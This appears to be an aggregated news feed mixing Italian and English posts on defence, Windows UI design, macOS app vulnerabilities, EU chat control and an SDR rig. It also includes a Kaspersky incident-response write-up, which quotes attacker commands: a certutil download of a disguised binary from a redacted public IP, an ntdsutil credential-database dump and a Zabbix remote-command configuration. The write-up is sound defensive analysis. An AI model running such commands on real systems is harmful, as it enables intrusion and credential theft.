Salta al contenuto principale



I sottomarini a propulsione nucleare di India e Australia preoccupano Pechino

[quote]Quegli americani che argomentano un vantaggio strutturale degli Usa sulla Cina (chiamati nell’ambiente accademico primacists o denialists) si concentrano spesso sulle frontiere dei due Paesi: mentre gli Usa confinano con due Paesi amici e due oceani, Pechino è al centro di una regione



Pfizer, Microsoft, Palantir, Home Depot, and Lockheed Martin were all shown as "clients" of LobbyMatic. All of them say they haven't worked with the company.

Pfizer, Microsoft, Palantir, Home Depot, and Lockheed Martin were all shown as "clients" of LobbyMatic. All of them say they havenx27;t worked with the company.#LobbyMatic #JacobWohl #AIImages #AI #AILobbying



A Windows Control Panel Retrospective Amidst a Concerning UX Shift


19008928

Once the nerve center of Windows operating systems, the Control Panel and its multitude of applets has its roots in the earliest versions of Windows. From here users could use these configuration applets to control and adjust just about anything in a friendly graphical environment. Despite the lack of any significant criticism from users and with many generations having grown up with its familiar dialogs, it has over the past years been gradually phased out by the monolithic Universal Windows Platform (UWP) based Settings app.

Whereas the Windows control panel features an overview of the various applets – each of which uses Win32 GUI elements like tabs to organize settings – the Settings app is more Web-like, with lots of touch-friendly whitespace, a single navigable menu, kilometers of settings to scroll through and absolutely no way to keep more than one view open at the same time.

Unsurprisingly, this change has not been met with a lot of enthusiasm by the average Windows user, and with Microsoft now officially recommending users migrate over to the Settings app, it seems that before long we may have to say farewell to what used to be an intrinsic part of the Windows operating system since its first iterations. Yet bizarrely, much of the Control Panel functionality doesn’t exist yet in the Settings app, and it remain an open question how much of it can be translated into the Settings app user experience (UX) paradigm at all.

Considering how unusual this kind of control panel used to be beyond quaint touch-centric platforms like Android and iOS, what is Microsoft’s goal here? Have discovered a UX secret that has eluded every other OS developer?

A Simple Concept

The Windows 3.1 Control Panel (1992). (Source: ToastyTech.com)The Windows 3.1 Control Panel (1992). (Source: ToastyTech.com)
Settings which a user may want to tweak on their computer system range from hardware devices and networks to the display resolution and wallpaper, so it makes sense to put all of these configuration options within an easy to reach and use location. Generally this has meant something akin to a folder containing various clickable icons and accompanying text which together make clear what settings can be configured by opening it. In addition, the same setting dialogs can be accessed using context-sensitive menus, such as when right-clicking on the desktop.
The Windows 98 Control Panel. (Source: ToastyTech.com)The Windows 98 Control Panel. (Source: ToastyTech.com)
It’s little wonder that for the longest time operating systems have settled for this approach, as it is intuitive, and individual items can have stylized icons that make it even more obvious what settings can be configured by clicking on it, such a keyboard, a mouse, a display, etc. As graphical fidelity increased, so did the styling of these icons, with MacOS, Windows, BeOS and the various desktop environments for OSs like the Linuxes and BSDs all developing their own highly skeuomorphic styles to make their UIs more intuitive and also more pleasant to look at. A good overview of the Windows Control Panel evolution can be found over at the Version Museum website.
The Windows XP Control Panel in 'Classic' view. (2001) (Source: suffieldacademy.org)The Windows XP Control Panel in ‘Classic’ view. (2001) (Source: suffieldacademy.org)
Coming from the still somewhat subdued style of Windows XP after years of Windows 9x and Windows NT/2000, Windows Vista and Windows 7 cranked this style up to eleven with the Windows Aero design language. This meant glass, color, translucency, depth and high-fidelity icons that made the function of the Control Panel’s individual entries more obvious than ever, creating a masterpiece that would be very hard to beat. The user was also given two different ways to view the Control Panel: the simplified category-based view, or the ‘classic’ view with all icons (and folders for e.g. Administrative Tools) visible in one view.
Windows 7 Control Panel (2009) in category view. (Source: techrepublic.com)Windows 7 Control Panel (2009) in category view. (Source: techrepublic.com)
Meanwhile Apple did much the same thing, leaning heavily into their unique design language not only for its desktop, but ultimately also for its mobile offerings. Everything was pseudo-3D, with vivid colors adorning detailed renderings of various physical items and so on, creating a true feast for the eyes when taking in these lush UIs, with efficient access to settings via clearly marked tabs and similar UI elements.
The Mac OS X Panther System Preferences in 2003. (Source: Gadget Unity TV)The Mac OS X Panther System Preferences in 2003. (Source: Gadget Unity TV)
This way of organizing system settings was effectively replicated across a multitude of environments, with operating systems like Haiku (based on BeOS) and ReactOS (re-implementing Windows) retaining those classical elements of the original. A truly cross-platform, mostly intuitive experience was created, and Bliss truly came to the computing world.

Naturally, something so good had no right to keep existing, ergo it had to go.

The World Is Flat


The first to make the big change was Microsoft, with the release of Windows 8 and its Metro design language. This new visual style relied on simple shapes, with little to no adornments or distractions (i.e. more than a single color). Initially Microsoft also reckoned that Windows users wanted every window to be full-screen, and that hot edges and sides rather than a task bar and start menu was the way to go, as every single system running Windows 8 would obviously have a touch screen. Fortunately they did backtrack on this, but their attempt to redesign the Control Panel into something more Metro-like with the Settings app did persist, like an odd growth somewhere on a body part.
Windows 8's PC Settings app (2012). (Source: softpedia.com)Windows 8’s PC Settings app (2012). (Source: softpedia.com)
Although the Control Panel remained in Windows 8 as well, the course had been set. Over time this small lump developed into the Settings app in Windows 10, by which time Metro had been renamed into the Microsoft Design Language (MDL), which got a recent tweak in what is now called the Fluent Design Language (FDL) for Windows 11.

Central to this is the removal of almost all colors, the use of text labels over icons where possible (though simple monochrome icons are okay) and only rectangles with no decorations. This also meant no folder-centric model for settings but rather all the items put into a text-based menu on the left-hand side and an endless scroll-of-doom on the right side containing sparsely distributed settings.

This led to the absolutely beautifully dystopian Settings app as it exists in Windows 10:
The Settings app in Windows 10 back in ~2015. Hope you don't like colors.The Settings app in Windows 10 back in ~2015. Hope you don’t like colors.
All of this came as skeuomorphic designs were suddenly considered ‘passé’, and the new hotness was so-called Flat Design. Google’s Material Design as developed in 2014 is another good example of this, with the characteristic ‘flat UI elements adrift in a void’ aesthetic that has now been adopted by Microsoft, and a few years ago by Apple as well starting in 2022 with MacOS Ventura’s System Settings (replacing System Preferences).
Monterey’s General system preferences (left) are different from Ventura’s General system settings (right). (Credit: MacWorld)Monterey’s General system preferences (left) are different from Ventura’s General system settings (right). (Credit: MacWorld)
Rather than a tabbed interface to provide a clear overview, everything is now a blind hierarchy of menu items to scroll through and activate to access sub-, sub-sub-, and sub-sub-sub- items, and inevitably realize a few times that you’re in the wrong section. But rather than being able to click that other, correct tab, you now get to navigate back multiple views, one click at a time.

It isn’t just Windows and Apple either, but many of the big desktop environments like Gnome have also moved to this Flat Design Language. While various reasons have been provided for these changes, it’s undeniable that FDL makes a UI less intuitive (because there’s less useful visual information) and makes for a worse user experience (UX) with worse ergonomics as a result (because of the extra scrolling and clicking). This is especially obvious in the ‘independent applets’ versus ‘monolithic settings app’ comparison.

One-Track Mind


Imagine that you’re trying out a couple new wallpapers in Windows while keeping an eye on Windows Update’s latest shenanigans. You then need to quickly adjust the default audio device or another small adjustment unrelated to any of these other tasks. If you are using Windows 7 or earlier with the Control Panel applets, this is normal behavior and exceedingly common especially during hardware troubleshooting sessions.

If you’re using the Settings app, this is impossible, as only view can be active at a given time. You think you’re smart and right-click the desktop for ‘Personalize desktop’ so that the other Settings view stays intact? This is not how it works, as the Settings app is monolithic and now shifts to the newly selected view. Currently this is not too noticeable yet as many applets still exist in Windows 10 and 11, but as more and more of these are assimilated into the Settings app, such events will become more and more common.

It would seem that after decades of UI and UX evolution, we have now reached a definite point where UX is only getting worse, arguably around the release of Windows 8. With color banished, anything even remotely pseudo-3D frowned upon and UIs based around touch interfaces, there will soon be no difference between using a desktop PC, tablet or smartphone. Just in the worst way possible, as nobody has ever written about the amazing ergonomics and efficient UX of the latter two devices.

Perhaps our only hope may lie with the OSes and desktop environments that keep things real and stick to decades of proven UX design rather than give into Fad Driven Development.

Rest in peace, Windows Control Panel. We hope to see you again soon in ReactOS.


hackaday.com/2024/09/03/a-wind…



Le App Microsoft su macOS possono essere utilizzate per accedere ai dati riservati dell’Utente


I ricercatori di sicurezza hanno scoperto otto nuove vulnerabilità nelle versioni macOS delle applicazioni Microsoft (Outlook, Teams, Word, Excel, PowerPoint e OneNote), che, se sfruttate, consentono agli aggressori di aumentare i diritti e ottenere l’accesso a dati riservati.

Secondo una descrizione di Cisco Talos, i difetti identificati aiutano a bypassare le impostazioni sulla privacy nel sistema operativo, che sono basate sul framework TCC (Trasparenza, Consenso e Controllo).

“Se un aggressore sfrutta le vulnerabilità scoperte, potrà ottenere tutti i diritti concessi da Microsoft sulle applicazioni interessate”, scrivono gli esperti .
19007000
“Ad esempio, un utente malintenzionato potrebbe inviare e-mail dall’account della vittima, nonché registrare audio e video, senza alcuna interazione con l’utente preso di mira.” hanno aggiunto.

In teoria, un utente malintenzionato può inserire librerie dannose in una qualsiasi di queste applicazioni, cosa che gli permetterà non solo di ottenere i diritti di quest’ultima, ma anche di estrarre una serie di dati riservati. Come notano gli esperti, per uno sfruttamento efficace l’aggressore deve già avere un certo accesso al sistema della vittima.

TCC e protezione dei dati


TCC applica una politica che richiede alle applicazioni di ottenere il consenso esplicito dell’utente prima di poter accedere a risorse protette quali contatti, calendari, foto e posizione, garantendo che gli utenti mantengano il controllo diretto sulle proprie informazioni personali e sull’accessibilità dei propri dati alle applicazioni.

TCC opera congiuntamente agli entitlement, che sono un set di capacità richieste per la funzionalità di un’app. Gli sviluppatori scelgono questi entitlement da una selezione fornita da Apple e, sebbene solo un sottoinsieme di tutti i possibili entitlement sia disponibile per l’uso generale, i più potenti sono riservati esclusivamente alle applicazioni e ai binari di sistema di Apple.

Quando un’applicazione con diritti specifici richiede inizialmente l’utilizzo di una specifica funzionalità, viene visualizzato un pop-up di autorizzazione.
19007002
L’immagine sopra mostra un esempio di tale richiesta di autorizzazione: “Malevolent App” vorrebbe accedere alla telecamera. L’utente deve decidere se consentire o negare l’accesso alla telecamera. Questa decisione viene quindi registrata nel database TCC.

Una volta che l’utente ha fatto la sua scelta, qualsiasi futura richiesta relativa alla telecamera da parte della “Malevolent App” sarà regolata dalla decisione registrata nel database. Questo sistema consente effettivamente agli utenti di controllare ed essere informati delle azioni sensibili alla privacy che un’applicazione intende eseguire. La necessaria interazione dell’utente è ciò che consente agli utenti di impedire alle applicazioni dannose di eseguire azioni sensibili come la registrazione di un video o lo scatto di foto.

Un utente può successivamente verificare questa autorizzazione nella sezione “Privacy e sicurezza” delle “Impostazioni di sistema” di macOS. Lì, è possibile trovare un elenco di autorizzazioni, tra cui Fotocamera, Microfono e Servizi di localizzazione.

L'articolo Le App Microsoft su macOS possono essere utilizzate per accedere ai dati riservati dell’Utente proviene da il blog della sicurezza informatica.




Perché il prossimo documento strategico di Londra riguarda anche Roma

[quote]L’eco della Strategic defence review (Sdr) annunciata dal nuovo primo ministro britannico Keir Starmer è arrivato anche in Italia, sulle ali del Global combat air programme (Gcap). Se Guido Crosetto, ministro della Difesa, e i vertici di Leonardo hanno espresso sicurezza circa la stabilità del



La newsletter di FSFE: il Caso Apple, iFinanziamenti per il Software Libero, YH4F e il Progetto ZOOOM

Supportare il Software Libero in Europa dopo la decisione EU di bloccare i finanziamenti alla #NGI, e la causa di #Apple contro la Commissione Eur…



Nuovo elicottero britannico. Leonardo verso la commessa da un miliardo

[quote]L’italiana Leonardo è rimasta l’unica azienda in gara per la commessa, stimata in un miliardo di sterline (1,19 miliardi di euro), per rinnovare la componente ad ala rotante delle Forze armate britanniche. Il ritiro di Airbus e Sikorsky (società del gruppo Lockheed Martin) dalla gara per il programma



Esperti di sicurezza? Siete i più richiesti! Nella PA, il 46% delle posizioni in Cybersecurity è vacante


Da un sondaggio globale commissionato da Kaspersky Lab è emerso che il 41% delle aziende ha un disperato bisogno di specialisti della sicurezza informatica. Gli esperti in minacce alla sicurezza informatica e gli specialisti nell’analisi del malware sono i più richiesti (39% ciascuno).

C’è anche una carenza di analisti SOC (35%), specialisti di pentest e sicurezza di rete (33%) e analisti di Threat Intelligence (32%). Se suddivisa per settore, la carenza di personale addetto alla sicurezza informatica è più avvertita nel settore pubblico, dove quasi la metà dei posti vacanti non viene occupata (46%).

Al secondo posto in questa classifica si trovano telecomunicazioni e media (39%), al terzo posto vendita al dettaglio e sanità (37% ciascuno). L’area della sicurezza informatica è meglio coperta nel settore IT e finanziario (rispettivamente 31 e 27%).

L’indagine, condotta da Grand View Research in 29 paesi, ha coinvolto 1.012 rappresentanti aziendali che ricoprono varie posizioni: manager (IT, SOC), principali specialisti, esperti di sicurezza informatica.

“Vediamo una forte domanda, in particolare, di ingegneri per l’implementazione della sicurezza informatica e analisti SOC, nonché di specialisti nello sviluppo della sicurezza”, ha affermato Vladislav Galimov, capo del gruppo di reclutamento per la sicurezza informatica di Kaspersky.

“Inoltre, crediamo che nel prossimo futuro inizierà a crescere la necessità di esperti nel campo dell’intelligenza artificiale e della sicurezza delle reti neurali”. Risultati simili sono stati ottenuti da uno studio simile sul mercato del lavoro nel campo della sicurezza informatica , condotto da Angara Security .

Secondo il fornitore di servizi, lo scorso anno il numero dei posti vacanti nel settore della sicurezza informatica è aumentato del 27%.

Secondo gli esperti, la crescente carenza di personale addetto alla sicurezza informatica è direttamente collegata al percorso generale verso la digitalizzazione dell’economia e all’inasprimento dei requisiti normativi in ​​materia di sicurezza di fronte all’aumento del numero e della complessità degli attacchi informatici .

L'articolo Esperti di sicurezza? Siete i più richiesti! Nella PA, il 46% delle posizioni in Cybersecurity è vacante proviene da il blog della sicurezza informatica.



Robot e fanti assieme. L’esercito americano vuole più droni per le forze di terra

[quote]L’Us Army ha stipulato un contratto quadro da massimo 990 milioni di dollari con AeroVironment per la fornitura di munizioni circuitanti, meglio conosciute come loitering munitions, di tipo Switchblade. Di munizioni circuitanti Switchblade esistono le varianti 300 (2,5



Chat control blitz decision? Hungary wants to push through unprecedented EU plans for messenger mass surveillance after all


As early as tomorrow morning, a majority of EU governments could endorse the controversial draft law on chat control, which had been removed from the agenda in June after massive protests. According to a report by the news service Contexte, the new Hungarian Council Presidency intends to achieve a majority with a small twist, namely removing the searching for unknown material using „artificial intelligence“ (as requested by the Netherlands). The exact details of the Hungarian proposal are kept secret. But the proposal is still to require bulk automated searches in and disclosure of private chats, including end-to-end encrypted chats, that might contain illegal photos or videos. If a user opt out of this “upload moderation” of their chats, they would be blocked from receiving or sending any images, videos and URLs. Signal and Threema have announced they would end their services in the EU if forced to implement the proposed automated monitoring (so-called “client-side scanning”).

Former Pirate Party Member of the European Parliament Patrick Breyer is now calling on EU citizens to turn to their governments: “In June, under massive public pressure, there was a fragile blocking minority to save our digital privacy of correspondence and secure encryption. But now, with no spotlight on government dealings, minimal concessions could tip the scales. Europeans need to understand that they will be cut off from using commonplace secure messengers if chat control is adopted – that means losing touch with your friends and colleagues around the world. Do you really want Europe to become the world leader in bugging our smartphones and requiring blanket surveillance of the chats of millions of law-abiding Europeans?“

Breyer describes the proposal to restrict chat controls to supposedly ‘known’ illegal content as window-dressing: “Regardless of the objective – imagine the postal service simply opened and snooped through every letter without suspicion. It’s inconceivable. Besides, it is precisely the current bulk screening for supposedly known content by Big Tech that exposes thousands of entirely legal private chats, overburdens law enforcement and mass criminalises minors.

The European Parliament is convinced that this Orwellian approach will betray children and victims by inevitably failing in court. It calls for truly effective child protection by mandating security by design, proactive crawling to clean the web and removal of illegal content – none of which is contained in the government proposal on the table now. We have one day to make our governments take a different approach of effective and rights-respecting protection while saving our privacy and security online!”

Breyer’s info portal on chat control: chatcontrol.eu


patrick-breyer.de/en/chat-cont…



A deep dive into the most interesting incident response cases of last year


18998196

In 2023, Kaspersky’s Global Emergency Response Team (GERT) participated in services around the world that allowed our experts to gain insight into various threats and techniques used by APT groups, common crimeware and, in some cases, internal adversaries. As we highlighted in our annual report, the most prominent threat in 2023 was ransomware, and the Government vertical was the sector that most frequently requested digital forensics, incident response and malware analysis (DFIRMA) services. While file encryption was the most common threat last year, this post proposes a deep dive into specific cases that caught our attention and were mentioned during our annual DFIRMA report webinar.

The insider fraud attack


18998198

A group of collaborators at a government organization identified an internal service that allowed the creation of legitimate transactions that weren’t direct money transfers, but could result in monetary losses for the organization. These losses could reach millions of dollars.

The following scenario (not related to a specific customer) could be considered an example of such misuse of an internal service:

A bank only allows a customer to open a maximum of two bank accounts for free, with the customer paying a fee to open additional accounts. However, the adversary used the internal system to create multiple bank accounts for individual customers, who avoided paying the required fees in exchange for a payment to the adversary. As a result of this incident, the organization reported a loss of more than $20 million.


Many logs related to the application in question, as well as VPN access and network activity, were requested for analysis and the employees involved in the fraudulent activity were identified. Two different cases were analyzed in which the abuse of transaction configuration was confirmed, one by exploiting a vulnerability in a debugging interface and the other by misusing privileges in a valid account.

In the first case, GERT identified a misconfiguration that was abused by the adversaries to steal cookies from other users to impersonate them and their activity. An application on one of the analyzed systems registered exception logging details that included cookies for the user that encountered the exception, allowing us to determine the user involved.

In the other case, one of the users modified the privileges and details of another user, impersonating that user to create additional transactions in the internal service and attempting to hide the original details. Later, this newly modified user accessed the VPN from a previously known system where another user was accessing the transaction system for what was initially catalogued as legitimate activity, but which was recently confirmed to be part of the malicious activity.

Most of the criminal activity was performed by accessing the infrastructure through the VPN, but it was discovered that a new user was accessing the transaction system from the internal network using the same unauthorized behavior.

The results of the GERT team’s analysis confirmed the collusion of a user involved in the transaction requests and managed to identify the sources and link the user activity to various systems involved in the investigation, including local and remote IDs. This information was used by the customer in a timely manner to take legal action against the insider employee and his accomplices.

Mitre ATT&CK techniques
TacticTechnique used Technique IDDetails
Initial Access
Persistence
Valid AccountsT1078The adversaries used legitimate credentials to access the VPN and the internal service
Initial AccessExternal Remote ServicesT1133The adversary used the сustomer’s VPN service to gain network access to the internal service
Credential AccessSteal Web Session CookieT1539The adversary abused a misconfiguration in the transactions service to steal other users’ cookies.
ImpactData ManipulationT1565After impersonating other users with privileges to create transactions, the adversary started creating unauthorized transactions on their behalf.

Flax Typhoon/SLIME13 APT attack


18998200

After enabling Kaspersky Managed Detection and Response (MDR) in a customer’s infrastructure, our platforms detected the presence of well-known software installed on the customer’s premises without their knowledge.

Although these applications were legitimate, attackers used them to gain persistent access to the victim’s environment.

In September 2023, Kaspersky MDR detected a suspicious service on a corporate host. The adversaries used a technique that mimicked the real system application name conhost.exe, but the service was started from a non-standard folder. GERT’s analysis confirmed that the application wasn’t a system service, but was instead associated with SoftEther VPN, a legitimate multi-protocol VPN software.

The supposed conhost application was downloaded to the system by a legitimate local user using the well-known Windows LOLBin certutil, and then installed via command line as a system service:
certutil.exe -urlcache -split -f hxxp://<Public IP>/conhost.exe
Another suspicious service masquerading as wshelper.dll was observed on another host. This DLL was associated with Zabbix agent, which is typically deployed on a monitoring target to actively monitor local resources and applications.

Analysis of the sample confirmed that the configuration file was set to allow remote commands, taking advantage of passive and active checks enabled by Zabbix.
EnableRemoteCommands=1
LogFile=0
Server=0.0.0.0/0
ListenPort=5432
Port 5432 was configured in a firewall rule to allow listening, with the “smart” name PGSQL to make it look legitimate.

GERT’s analysis confirmed that the intrusion lasted more than two years. In the early stages of the attack, an NTDS dump was created using system commands:
cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test" q q
c:\windows\sysvol\domain\ntds\active directory\ntds.dit"
During those two years of intrusion, security controls detected and contained multiple attempts to execute pentesting applications such as Mimikatz and CobaltStrike, but all the repurposed legitimate software remained invisible until the customer decided to implement our MDR solution. GERT analysis confirmed that the infrastructure had been compromised since mid-2021. The artifacts and TTPs of the attackers are similar to those used by the Flax Typhoon APT group, which employs minimal malware and custom payloads, but relies heavily on legitimate applications instead.

Mitre ATT&CK techniques
TacticTechnique used Technique ID
Initial AccessExploit Public-Facing ApplicationT1190
Resource DevelopmentDevelop Capabilities: MalwareT1587.001
Credential AccessOS Credential Dumping: LSASS MemoryT1003.001
Credential AccessOS Credential Dumping: Security Account ManagerT1003.002
Command And ControlProtocol TunnelingT1572
Command And ControlIngress Tool TransferT1105
Credential AccessBrute Force: Password SprayingT1110.003
ExecutionExploitation for Client ExecutionT1203
Lateral MovementRemote Services: Remote Desktop ProtocolT1021.001
Lateral MovementRemote Services: SMB/Windows Admin SharesT1021.002
Defense EvasionMasquerading: Match Legitimate Name or LocationT1036 .005

The MFA lack of control


18998202

After enabling multi-factor authentication (MFA) for its “critical employees”, a financial company was targeted by a spear-phishing attack.

The phishing attack spoofed the popular DocuSign platform and was directed at a specific group of employees. Although the company detected the phishing attack and configured rules to avoid receiving similar emails, some users received and opened the malicious email.

Among those who unwittingly opened the link was one of the protected users. The attackers were able to take control of his account thanks to the implementation of a phishing kit configured to automatically steal the MFA tokens.

The initial phishing attack occurred on October 6, 2023, and GERT analysts confirmed that one of the targeted users opened the malicious email the same day, which was followed by new connections opened from different locations outside the company’s headquarters. The attackers also configured additional MFA devices to access the target user’s mailbox contents without being noticed and without tampering with the original mailbox.

The attackers accessed the contents of the mailbox for a few days, allowing them to understand internal processes and prepare a BEC attack.

One month after the initial access, the attackers compromised a privileged email account (where MFA was not enabled). This new account had privileges in Microsoft 365, which allowed new rules and parameters to be configured. The attackers configured “send as” privileges on behalf of critical users, such as money transfer approvers and requesters. The adversaries also used this account to configure forwarding rules to hide messages received from a specific bank and from specific users.

Once the necessary privileges and rules were configured, the attackers sent a new email request using a legitimate template previously used in the company to request money transfers and attached documents collected from the original compromised account, but with a different destination bank account, requesting an international transfer of more than $300,000.

Upon receiving the request, the bank processed the transfer as usual based on the legitimate source and attached documents.

A notification was sent to the customer from an email address belonging to the bank, confirming the transfer. However, this email address wasn’t listed in the attackers’ forwarding rules, so the message was delivered to the customer’s mailbox. After receiving this message, the customer decided to investigate the user responsible for the privileged mail account.

GERT’s analysis confirmed the initial attack date and vector, the compromised users, and all the techniques used by the threat actors, and provided a set of recommendations for protecting and monitoring cloud assets. By analyzing user access logs (UAL) and additional cloud logs, as well as firewall logs and the client’s own system logs, GERT was able to provide a complete timeline detailing all the techniques used by the fraudsters.

Mitre ATT&CK techniques
TacticTechnique used Technique IDDetails
Initial AccessPhishing: Spear phishing LinkT1566.002Targeted attack against customer domain from October 6, 2023
PersistenceAccount Manipulation: Device RegistrationT1098.005Multiple authentication methods enabled for a compromised user
Credential AccessBrute Force: Password GuessingT1110.001Failed access on behalf of multiple users
Credential AccessBrute Force: Password SprayingT1110.003Tests for attempted access using credentials confirmed as stolen by Malware Stealers
Privilege EscalationAccount Manipulation: Additional Email Delegate PermissionsT1098.002New permission configured to avoid detection and to access different mailboxes
PersistenceEmail Collection: Email Forwarding RuleT1114.003New rules configured to evade detection and remain persistent

ToddyCat-like APT attack with an ICMP backdoor


18998204

Kaspersky’s Managed and Detection Response service (MDR) was alerted to suspicious activity on domain controllers and Exchange servers.

GERT was contacted to investigate the case; our analysis confirmed SMB abuse and IKEEXT service exploitation, as well as exploitation of the Microsoft Exchange server remote code execution vulnerability (CVE-2021-26855).

One interesting finding was the use of IKEEXT for persistence. The vulnerability used by the attackers, along with the exploit for it, was first published by High-Tech Bridge Security Research Lab in 2012. It was associated with the wlbsctrl.dll library and originally used for privilege escalation. Shortly after the exploit was published, Microsoft patched the vulnerability. However, our analysts confirmed that the same library is now being used as a persistence mechanism for malware.

IKEEXT is a default service on Windows. It is invoked by the svchost process, which loads ikeext.dll, the DLL responsible for the IKEEXT service.

18998206

The ikeext.dll library, in turn, is responsible for loading a DLL named wlbsctrl.dll, which is default Windows behavior. However, while the svchost service always runs on the system, wlbsctrl.dll does not exist in the file system by default, and this where threat actors saw an opportunity.

18998208

The threat actors created a malicious version of wlbsctrl.dll and saved it on the system. Based on Windows behavior, this DLL was executed every time without requiring registration in Autorun, which is commonly used for persistence.

18998210

Besides persistence, in the investigated incident the threat actor used the IKEEXT vulnerability to perform lateral movement via the SMB protocol and created a custom firewall rule named DLL Surrogate that permits dllhost.exe to listen on custom port 52415. All this was achieved by placing the backdoored wlbsctrl.dll into the system32 folder where the legitimate library is normally stored (if present on the system).

Later, the attacker implemented an ICMP backdoor. Once the backdoor was identified, Kaspersky verified and detected two more in-the-wild samples outside the customer’s infrastructure. All the discovered samples were similar except for the following points:

  • Some differences in the PE header (normal behavior between similar samples);
  • Different mutex strings, all located at the same raw file offset;
  • Different bytes at the raw file offset 0x452–0x483, which are apparently useless (non-actionable) code.

Based on GERT’s analysis, the backdoor acted like a loader, configured to execute the following activities:

  • Check for the mutex; if it already exists in memory, terminate the process.
  • Attempt to read the file %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res; decrypt its contents using the AES algorithm with a hardcoded KEY and a KEY derived from the volume serial number (VSN) of the C drive, then use it to set the value of the registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, and then delete the file.
  • Load the contents of the default value of registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, decrypt it again with AES using the same KEY described above, and invoke the payload shellcode.
  • Allocate the shellcode size in a new segment and jump to it.

Note: The calculated REGKEY NAME (Interface {<calculated_for_each_host>}) is based on the VSN of the C drive (without host VSN it is not possible to decrypt correctly).

18998212

As part of the analysis, GERT identified a payload stored in the Windows registry and analyzed it, confirming the following behavior in the encrypted payload.

The decrypted payload has the header “CAFEBABE” (hex bytes magic related to Java Class files) followed by the shellcode size and finally the data. This payload executes the following commands:

  1. Decrypt itself (for the third time);
  2. If not running under exe, create a suspended dllhost process with the parameter “/Processid: {02D4B3F1-FD88-11D1-960D-00805FC79235}”, which refers to a COM+ system application service;
  3. Allocate space to the new process;
  4. Write a section of the decrypted payload (starting at offset 0x1A03, and having a size that’s contained in the small header at offset 0x19FF) into the new allocation;
  5. Patch dllhost (in memory only) to ensure execution at the newly allocated space;
  6. Resume the dllhost process.

A new instance of the shellcode starts from step one. It finds that it is actually running under dllhost, decrypts a new section, executes it and listens on port 52415. The final payload injected into dllhost.exe appears to create a raw ICMP socket with no port. No outbound connection is made (although the received payload likely communicates outbound). Data is received from an unknown source in a Base64-encoded ICMP packet, converted to binary, decrypted, and executed via direct execution of data (allocating space using the VirtualAlloc function), copying shellcode to the allocated space, making a direct call to the allocated space.

According to our threat intelligence platforms, this threat has similarities to APT attacks: the attack Tactics, Techniques and Procedures (TTP) used are very similar to the ToddyCat actor, but there’s no solid attribution to this group.

The objective of the threat actor was to gain persistence for monitoring and future impact, but no other objectives were confirmed based on the evidence obtained.

Mitre ATT&CK techniques
TacticTechnique used Technique ID
Resource DevelopmentDevelop Capabilities: ExploitsT1587.004
Resource DevelopmentDevelop Capabilities: MalwareT1587.001
Initial AccessValid Accounts: Domain AccountsT1078.002
Initial AccessValid Accounts: Local AccountsT1078.003
ExecutionSystem Services: Service ExecutionT1569.002
ExecutionUser Execution: Malicious FileT1204.002
PersistenceCreate or Modify System Process: Windows ServiceT1543.003
PersistenceHijack Execution Flow: DLL Side-LoadingT1574.002
PersistenceServer Software Component: Web ShellT1505.003
PersistenceValid Accounts: Domain AccountsT1078.002
Defense EvasionAbuse Elevation Control Mechanism: Bypass User Account ControlT1548.002
Defense EvasionDirect Volume AccessT1006
Defense EvasionModify RegistryT1112
Defense EvasionImpair Defenses: Disable or Modify System FirewallT1562.004
Defense EvasionImpair Defenses: Disable Windows Event LoggingT1562.002
Defense EvasionIndicator Removal: Clear Windows Event LogsT1070.001
Defense EvasionIndicator Removal: File DeletionT1070.004
Defense EvasionImpair Defenses: Impair Command History LoggingT1562.003
Command And ControlNon-Application Layer ProtocolT1095

Conclusions


Although statistics show the government sector was the most targeted vertical last year, it is clear that threat and crimeware actors do not care which vertical their potential targets belong to. To stay ahead of the attackers, the best course of action is to assess your asset inventory and continue to monitor and protect it.

The trend of cyberattacks and intrusions making use of infrastructure assets or legitimate on-premises applications creates the need to enable additional layers of monitoring based on threat intelligence. The implementation of MDR has been one of the recurring triggers for new investigations thanks to its detection capabilities and the ability of analysts to determine timely courses of action.

To learn more about our Incident Response report, we invite you to view the recording of the webinar “Analyzing last year’s cyber incident cases”.


securelist.com/incident-respon…



Portable Multi-SDR Rig Keeps Your Radios Cool


18996507

With as cheap and versatile as RTL-SDR devices are, it’s a good idea to have a couple of them on hand for some rainy day hacking. In fact, depending on what signals you’re trying to sniff out of the air, you may need multiple interfaces anyway. Once you’ve amassed this arsenal of software defined radios, you may find yourself needing a way to transport and deploy them. Luckily, [Jay Doscher] has you covered.

18996509His latest creation, the SDR SOLO, is a modular system for mounting RTL-SDRs. Each dongle is encased in its own 3D printed frame, which not only protects it, but makes it easy to attach to the base unit. To keep the notoriously toasty radios cool, each frame has been designed to maximize airflow. You can even mount a pair of 80 mm fans to the bottom of the stack to really get the air moving. The current design is based around the RTL-SDR Blog V4, but could easily be adapted to your dongle of choice.

In addition to the row of SDR dongles, the rig also includes a powered USB hub. Each radio connects to the hub via a short USB cable, which means that you’ll only need a single USB cable running back to your computer. There’s also various mounts and adapters for attaching antennas to the system. Stick it all on the end of a tripod, and you’ve got a mobile radio monitoring system that’ll be the envy of the hackerspace.

As we’ve come to expect, [Jay] put a lot of thought and effort into the CAD side of this project. Largely made of 3D printed components, his projects often feature a rugged and professional look that really stands out.


hackaday.com/2024/09/03/portab…



🔁 Sid Meier e la storia del videogioco – ossessioni e contaminazioni by francesco mazzetta ossessionicontaminazioni.com/2…

Sid Meier e la storia del videogioco – ossessioni e contaminazioni by francesco mazzetta
ossessionicontaminazioni.com/2…



PODCAST. Emergency a Gaza. Stefano Sozza: “Qui la peggiore delle crisi”


@Notizie dall'Italia e dal mondo
Dopo mesi in attesa del permesso umanitario, l'ong italiana è entrata a Gaza per offrire assistenza sanitaria di base alla popolazione martoriata dalla guerra. Abbiamo intervistato il capomissione Stefano Sozza
L'articolo PODCAST. Emergency a Gaza. Stefano Sozza:




@ nuova versione rilasciata 0.1.0-alpha18! Si tratta principalmente di una bugfix release, che contiene miglioramenti di layout, la visualizzazione della versione con blur delle immagini durante il caricamento, la propagazione degli eventi di aggiornamento di post/utenti tra le schermate, la possibilità di aggiungere un nuovo account direttamente dal bottom sheet di gestione, la distinzione tra cerchie modificabili e predefinite, più una nuova schermata con le informazioni sull'istanza corrente (accessibile dal menu laterale). Nei prossimi giorni: gestione dei messaggi diretti (specifica di Friendica). #friendica #friendicadev #androidapp #androiddev #fediverseapp #opensource #kotlin #kmp #compose #livefasteattrash

reshared this



Litigation funds: i pericolosi rapporti tra finanza e giustizia


